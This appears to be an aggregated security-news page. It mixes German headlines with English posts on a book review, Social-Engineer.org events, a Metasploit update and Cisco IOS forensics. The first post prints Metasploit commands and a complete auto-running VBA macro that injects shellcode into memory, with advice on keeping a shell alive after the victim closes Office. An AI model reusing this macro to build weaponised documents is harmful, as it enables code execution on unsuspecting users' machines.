Security News

Bradley Manning in 22 Punkten angeklagt

(author unknown)

scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there.  How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works.  Just enable the Developer tab, then hit up the Visual Basic button to change code around.

msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf

Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.

Anonymous-Aktivisten haben eine vertrauliche Telefonkonferenz von Scotland Yard und FBI abgehört und den Mitschnitt im Netz veröffentlicht. Das FBI bestätigte inzwischen die Echtheit der Tondatei.(author unknown)

Antiviren-Software, Backups, Updates, ein alternativer Browser und ein gesundes Misstrauen sind die Eckpunkte des BSI-Konzepts für einen sicheren PC.(author unknown)

In this episode we talk about Symantec. We introduce a very cool SpearPhishing tool (which is free), the VeriSign attack and we discuss RFID implications and microwave cooking directions for credit cards.

Links for this Episode:

1. New SpearPhising tool


2. VeriSign Hack


3. RFID and Credit Cards.


4. Offensive Countermeasures in Orlando!

Video Feeds:

(author unknown)

It’s been 6 years since Michal Zalewski’s “Silence on the wire” hit the shelves. Although “The Tangled Web” concentrates on a completely separate set of issues, you can’t fail but draw comparison between the two books. Zalewski’s unique style of writing brings both topics to life, not simply scratching the surface of a set topic, but diving headlong into the lowest levels to give the reader a true understanding of the reasons why, and the thought processes behind, any feature, bug, or technology discussed. The Tangled Web does for Web Applications what silence on the wire did for computers and networks.

The Tangled Web is split into 3 parts, starting off with a concise walk-through of the underlying technologies of the web. Unlike so many other books that take for granted that the reader is already up to par on the backstory, Zalewski takes the time to really dig deep into the tools, protocols and RFCs that run the modern web.

Part 1: Anatomy of the web

• It starts with a URL
• Hypertext Transfer Protocol
• Hypertext Markup Language
• Cascading Style Sheets
• Browser Side Scripts
• Non-HTML Document Types
• Content Rendering with Browser plug-ins

This not always pretty romp through an alphabet soup of acronyms gives the reader the knowledge need to not only understand and appreciate the 2nd part of the book as it should be, but is in my mind the single best source for anybody looking to really understand the web as it works today. Not the way you think it  works, the way it should work, or the way the RFCs say it needs to work, but the down and dirty truth behind the web. Nothing is what it seems, and when you place the safety of your computer in the hands of browser vendors, you’re not quite sure what you’re going to get it seems.

Part 2 of the book moves from understanding the web to understanding how browsers see and interpret the web, and how the browser security models really work. You’d think every browser would see things and handle things the same, but after even the first few pages you get the feeling that no 2 browsers are going to handle things the way you expect, or want!

Part 2: Browser Security Features

• Content Isolation Logic
• Origin Inheritance
• Life Outside Same-Origin Rules
• Other Security Boundaries
• Content Recognition Mechanisms
• Dealing With Rogue Scripts
• Extrinsic Site Privileges

Zalewski covers the very fundamentals the current generation of browsers use to protect users in a way that just seems to make things click. Even when discussing things like same-origin policy and how the different browsers interpret the rules, the information just seems to make sense without needing to re-read sections over and over (an issue I had with some of the “silence on the wire” content at times). A common theme that comes up in part 2 of the book is the “sins of the old”, were browsers are suffering from security issues due to lack of foresight. As more and more bandaids are stuck into the browser security models, things become ever complex. It’s sad to see however that companies still aren’t learning from this lack of foresight as issues crop up again and again (for example <canvas> loading of cross-domain images. An issue that’s since been resolved).

Those who cannot remember the past are condemned to repeat it. (George Santayana)

The chapter discussing “Content Recognition Mechanisms could easily be renamed to “101 reasons to always set a charset”. The sniffing logic of browsers is both scary and often abused. What struck me more than the scary quirks of certain browsers was that most people just aren’t aware of these issues… I know I wasn’t!

Moving into part 3 of the book, Zalewski talks about what’s to come in terms of browser advancements.

Part 3: A Glimpe Of Things To Come

• New And Upcoming Security Features
• Other Browser Mechanisms Of Note
• Common Web Vulnerabilities

Despite what the first 2 chapters of the tangled web bring to light, it doesn’t seem that browser vendors have learnt the lesson from history. New features seem to once again be applied unevenly across browsers, with Microsoft going their own route with things like xDomainRequest. Not to be left out in the cold, Mozilla’s drive for CSP is discussed in-depth along with other restriction frameworks. There’s a lot of ideas in this space it seems, but little consensus on how or what to implement.

Conclusions

I love this book… there’s no other way to say it. Every once in a while you get a book that’s well written, contains good content and sparks those little ideas in the back of your brain. For me, the tangled web met all of these points and then some. A book that gives you so much background on the how and the why of things, that you come out the other end really feeling like you know the subject matter.

That said, I’m not 100% sure who this book is targeted at… the addition of the “security engineering cheat sheets” at the end of each chapter is a great idea, and for a defender it provides some really good information. How ever I’m not sure I know many defenders that would pick this book up and give it the time it really deserves. Maybe I’m wrong on this, and I hope I am.

I also don’t didn’t see it being something the attacker types would be jumping all over themselves to read either. It’s not full of the usual hacking tips, tricks and tools you’ve come to expect from hacker books in the last few years. The information is more than that I find, but it needs to be applied to other ideas to be really useful. Still from a discussion with No Starch at Shmoocon, they sold out of the tangled web, so I hope I’m wrong on this too.

TL:DR; Read this book… give it your full attention, and come out the other end smarter for it!

Tagged: nostarch, tangled web, Zalewski

The video below is part 4 in our series of the top ten things you didn't know about Nessus and covers how to schedule scans from within Nessus:

Further Reading:

• Tenable Charitable Organization Subscription Program
• Tenable Information Security Training Organization Subscription Programs

Ein automatischer Dienst analysiert jede App im Android Market und entfernt sie bei Verdacht. Das soll bereits zu einer Abnahme der Malware geführt haben.(author unknown)

For almost 3 years the team at Social Engineer has been bringing you the best in Social Engineering information and education.  Social Engineering information, tips, tricks, research, which eventually has branched off and created live, in-person, intensive training classes. As the new year gets into full swing we wanted to highlight some of our upcoming events and announcements.

Chris “loganWHD” Hadnagy will be conducting a round table open discussion at RSA this year. The topic of his panel is “Social Engineering – Is it the Biggest Threat?” Social Engineering (SE) is a hot topic that has gained a lot of notoriety in recent attacks.

Anonymous claims it is using SE in all of its attacks, yet despite the wake of devastation, companies are still reluctant to accept Social Engineer Penetration Tests. Is SE a big threat? If so what NEEDS to be done to protect business from this threat? Find out at RSA!

RSA Conference – March 1st, 2012 @ 2:10pm – Moscone Center, San Francisco, CA

This year also marks the start of Social-Engineer.Com’s exciting new 5-day, intensive, live, hands-on classes dubbed Social Engineering for Penetration Testers. We are excited to announce that just 1 month after going live with our dates, our April classes in Bristol, UK are completely SOLD OUT! Seats for this groundbreaking class and certification are going fast!

If the class sells out and you don’t get in – we don’t want to hear any whining. This course is not simply a set of lectures, it’s a hands-on, interactive class led by two of the industry’s most knowledgeable and trusted sources for all things Social Engineering, Chris Hadnagy and Robin Dreeke. This class will give you the skills necessary to take on the Social Engineering Pentest Professional (S.E.P.P.) certification. (as well as give you 40 CPE credits) The Social Engineering for Penetration Testers course will be held in the following locations at dates specified:

March 5th – 9th, 2012 – Seattle, WA, USA
April 9th – 13th, 2012 – Bristol, UK – SOLD OUT
July 21st – 24th, 2012 – Black Hat Conference, Las Vegas, NV, USA
August 20th – 24th, 2012 – Bristol, UK
November 12th – 16th, 2012 – Columbia, MD, USA

Eric “Urbal” Maxwell will present full analysis of the data collected during the 2011 Social Engineer Capture the Flag contest held at Defcon 19. This data includes an in-depth look at the contest, the targets, the attackers, and everything in between. Data analyzes how individual companies performed against the attacks, differences in industry defense, types of attacks, tools used, pretexts, attack vectors, and what could have been done to mitigate such attacks. This presentation can be heard at the following events:

2600 – PHX2600 – Feb 3rd, 2012

BSides Phoenix – February 18th, 2012 – Dave & Busters, Tempe, AZ

Also, in January 2012, the SEORG team took over PenTest Magazine and authored 5 articles on Social Engineering!

Mastering the Behavioral Techniques for Quick Rapport and Elicitation – Robin Dreeke
Primer on Priming – Eric Maxwell
Neuro-Linguistic Hacking – Chris Hadnagy
The Power of the Ultimate Social Engineer – Chris Hadnagy
Selling Social Engineering Services – Jim O’Gorman
The Top Five Social Engineering Mitigation Tips – Chris Hadnagy

Of course, we can’t fail to mention that Defcon 20 rapidly approaches.  The SE CTF will be bigger, badder, and sexier than ever. This year (SPOILER ALERT) the SE CTF will be a “Battle of SExes”.  Want more details than that?  You’ll have to wait.  But we are presently searching for willing companies who want to work with us as sponsors, targets and supporters.  We will be announcing the events soon.

In addition, we have been asked to come up with another year of the SE CTF for Kids!  If you thought last year was crazy, this year will prove to be even more amazing.  There will be some serious changes in how this event is structured – it will be more challenging, more fun, and even crazier than last year.

2012 is shaping up to be an exciting year for computer security, social engineering, and especially Social-Engineer.org! Stay tuned for everything you have come to expect… informative blogs, hard-hitting newsletters, engaging podcasts, automated toolkits, world-renowned Capture the Flag contests, and industry standard how-to books… and even things you never saw coming… 5-Day LIVE classes taught by the pros! Stay tuned to Social-Engineer, we’re just getting started!

Als Lockvogel diente eine gut gemachte Einladung zu einer renommierten Konferenz. Sie schmuggelte dann Spionage-Software auf die Rechner der Firmenangehörigen.(author unknown)

Der US-Konzern meldete Ende 2011 mehrere Einbrüche in seine IT-Systeme im Jahr 2010 bei den Behörden. Dass dabei etwas Wichtiges gestohlen wurde, glaube man aber nicht.(author unknown)

Mit einem einfachen Trick können Apps auf bestimmten HTC-Smartphones das nicht für sie bestimmte WLAN-Passwort ausspionieren.(author unknown)

Die Polizei Nordrhein-Westfalen ist bereits den zweiten Tag nicht mehr aus dem Internet erreichbar. Bei Überprüfungen des Kommunikationssystems war eine Sicherheitslücke entdeckt worden.(author unknown)

Die PHP-Entwickler arbeiten gerade fieberhaft an der Beseitigung einer kritischen Sicherheitslücke in PHP, die sie selber erst durch einen Sicherheits-Patch eingeführt haben. Noch lässt sich die Tragweite nicht ganz abschätzen.(author unknown)

Nachdem die beliebte Internet-Tauschbörse Ex.ua von den Behörden vom Netz genommen wurde haben ukrainische Hacker nun zum Gegenschlag ausgeholt und die Webseiten der Regierung, des Geheimdienstes und der Zentralbank lahmgelegt.

(author unknown)

Tonight, get the real story on APT, Shady RAT, and HTran from one of the leading researchers on APT, Joe Stewart of the Counter Threat Unit of Dell SecureWorks. We follow up with a Guest Tech Segment on the current state of Android (in)security and malware with Jon Oberheide. This will be a great episode which you won't want to miss, all live on Episode 276 of PaulDotCom Security Weekly!

Participate in our IRC channel or sit back and enjoy it live via the link below:

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 276 show notes page.

- Paul Asadoorian, Larry Pesce, Jack Daniel. Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

(author unknown)

Das Update soll unter anderem die Stabilität, Kompatibilität und Sicherheit des Betriebssystems verbessern.(author unknown)

Summary

This weekly update brings 8 new modules and a bucket 'o bugfixes. Modules include pcAnywhere TCP and UDP scanners, VMWare Web login scanners, an exploit for MS12-004 (midiOutPlayNextPolyEvent Heap Overflow) and VirtualBox and VMWare enumeration modules. Also included are a default password scanner for Ektron CMS400.NET, a vBSEO <= 3.6.0 code injection module and an overflow for HP Diagnostics Server.

 

Module Changes

• Ektron CMS400.NET Default Password Scanner
• pcAnywhere TCP Service Discovery
• pcAnywhere UDP Service Discovery
• VMWare Web Login Scanner
• vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection
• MS12-004 midiOutPlayNextPolyEvent Heap Overflow
• HP Diagnostics Server magentservice.exe overflow
• Multi Gather VirtualBox VM Enumeration
• Multi Gather VMWare VM Identification

 

 

Resolved Bugs & Changes

• Issue #6294 : Meterpreter uses native Windows stat struct for file info.
• Issue #6278 : vmauthd module now alerts users when it's unable to connect.
• Issue #6277 : http_fingerprint now uses report_web_site call.
• Issue #6297 : Hash dump crack no longer delays other actions.
• Issue #6291 : Small task.info is handled.
• Issue #6266 : Discover now handles case where excluded_ips == included_ips.
• Issue #6260 : Post modules handle EOFError.
• Issue #6235 : Report generation for compromised hosts handles exception.
• Issue #6217 : Searching modules handles UTF-8.
• Issue #6208 : Cloning a bruteforce task after deleting an imported cred file now handles errors.
• Issue #6199 : Evidence Collection has been renamed.
• Issue #6192 : Virtual Hosts are now identified as XXXX as part of the Discovery phase.
• Issue #6061 : Target Addresses field is too small for IPv6 addresses.
• Issue #6056 : PostgreSQL scanner now connects to IPv6 targets.

 

How to Upgrade

Metasploit Pro is upgraded using the Administration menu and choosing the option Software Upgrade. To see how to upgrade your Metasploit installation, view this video in the Rapid7 Community.

 

Version Information

PRO 4.1.4 20120124000001 revision 7417aa694e8bbe5b3658db71b62185c1bba63838 updates to 20120131000002 revision d175997e660a00cf78e6394e58d604535975bdf9

MSF3 4.1.4 20120124000001 revision 7ec5f9848093d2d16fd8422c40b01ec50ec4d59f updates to 20120131000002 revision ba50f84229acf3713cffe2167169ca0f4fb9c6c1

no-reply@rapid7.com

Congratulations to the OWASP ZAP team!
The Zed Attack Proxy is the 2011 Toolsmith Tool of the Year.
ZAP finished with 338 votes (36.5% of the total), slightly edging out Security Onion.
SO finished a strong second place with 328 votes (35.4%).
Volatility came in third with 152 (16.4%) and Armitage right on their heels in fourth with 148 votes (16%).

I am donating $50 to the OWASP ZAP project to honor this win.
I ask that those of you with the wherewithal and resources to do so please visit the project page and donate in any capacity you can.

Congratulations and thank you to all participants this year and I look forward to a strong 2012.










noreply@blogger.com (Russ McRee)

Recurity Labs created a system for the inspection of Cisco legacy IOS memory dumps back in 2008. The tool, called Cisco Incident Response, was meant to identify successful and unsuccessful exploits of binary nature against Cisco routers running IOS 11.x and 12.x. IOS 15.x is now available, but doesn't differ much from the previous releases in terms of internal design.

We ran an online service for uploading and analyzing IOS images together with core dumps generated from them. This service has been used by various people, but not a single core dump contained indications of an actual binary exploit against the platform. It seems that it's simply too easy to pwn a company by traditional means of browser, Flash, Java, EXE file in email, social engineering or cloud service.

To support nostalgic hobbyists concerning themselves with the same questions half a decade later, we decided to publish the source code of CIR today, in order to allow anyone to use it and inspect its inner workings. We believe that Kerckhoff's Principle also holds true for defense and detection systems. Therefore it is educating to look at code bases that have been tested in production for quite some time.

The code is interesting besides the embedded knowledge about Cisco IOS data structures. Here are a couple of points for the inclined reader:

• 23k lines of code, completely managed .NET (C#)
• Plug-in based knowledge system, where every plug-in consumes and provides some type of abstracted information about the subject, formulated by .NET types
• Several lists with differing offsets between IOS minor versions and service releases, for those assuming that IOS data structures will always look the same between e.g. 12.4.3 and 12.4.3J.
• An ELF file format parser that could be useful in other projects
• Report generation and daemon mode, to allow CIR to be used in corporate and provider networks automatically.

The code is released under GPLv3, and can be found at http://cir.recurity.com. We also provide a binary distribution for those who simply want to use it.

FX